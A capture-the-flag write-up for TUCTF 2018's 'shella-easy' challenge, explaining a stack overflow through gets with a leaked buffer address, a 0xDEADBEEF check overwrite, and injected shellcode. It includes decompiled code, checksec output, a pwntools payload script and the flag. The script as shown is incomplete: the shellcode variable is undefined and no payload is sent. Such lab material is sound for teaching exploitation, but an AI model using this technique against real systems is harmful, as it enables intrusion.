Tags: pwnable pwn 

Rating: 5.0

# Shella easy

## Description

Difficulty: easy-ish
Want to be a drive-thru attendant?
Well, no one does... But! the best employee receives their very own flag!
whatdya say?

nc 12345


## Test Run

Let's first test out the binary.

root@kali:~/Desktop/tuctf/shella-easy# ./shella-easy
Yeah I'll have a 0xff8f0080 with a side of fries thanks

Again, like ehh, it has some hexadecimal values being printed out.
Decompiling it, we see that we have a gets function which accepts memory location of s
whose memory location is printed out. This certainly will help us overcome the ASLR
since it is intentionally leaking the address.

int __cdecl main(int argc, const char **argv, const char **envp)
char s; // [esp+0h] [ebp-48h]
int v5; // [esp+40h] [ebp-8h]

setvbuf(stdout, 0, 2, 0x14u);
setvbuf(stdin, 0, 2, 0x14u);
v5 = -889275714;
printf("Yeah I'll have a %p with a side of fries thanks\n", &s);
if ( v5 != -559038737 )
return 0;

One more thing is the condition if `v5` not equals to -559038737 we will exit instead of a return. Since there are no other functions that we can jump to to read a flag, we can insert our shellcode maybe. But we first check if it is possible.

root@kali:~/Desktop/tuctf/shella-easy# checksec shella-easy
[*] '/root/Desktop/tuctf/shella-easy/shella-easy'
Arch: i386-32-little
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

Definitely possible. So now we want to jump to a shellcode to execute and we can
take advantage of the return instruction. However the current value of v5 always causes the program to exit instead of returning and popping the return address. To return, we need to overwrite the v5 variable to -559038737 which in hex is 0xDEADBEEF.

We now need to determine the number of buffers to overwrite before modifying v5 then number of buffers more to overwrite before controlling the EIP.

We can see that `s` is `[ebp-48h]` and v5 is `[ebp-8h]`. This means we need to overwrite `0x48 - 0x8 = 64 bytes`. We can insert our shellcode here and prepended it with NOP as padding. Then we need to overwrite the next 4 bytes with `0xDEADBEEF` then overwrite the remaining 0x48-64-4=4 bytes. Then another 4 bytes for the saved EBP and then the EIP address to jump to our shellcode. The address to jump to is the buffer which is printed out for us nicely.

We can write a script then gets the buffer address and craft the payload and then submit to spawn a shell.

## Python script
from pwn import *

#p = process("./shella-easy")

p = remote("", 12345)
k = p.recvrepeat(1)
print k
k = k.split(" ")[4]
print k
bufferLocation = p32(int(k,16))

payload = ""
payload += "\x90"*(64-len(shellcode))
payload += shellcode
payload += "\xef\xbe\xad\xde"
payload += "C"*8
payload += bufferLocation


and this gives the flag.


Flag: TUCTF{1_607_4_fl46_bu7_n0_fr135}

Original writeup (https://cexplr.home.blog/2018/11/26/shella-easy-tuctf-2018/).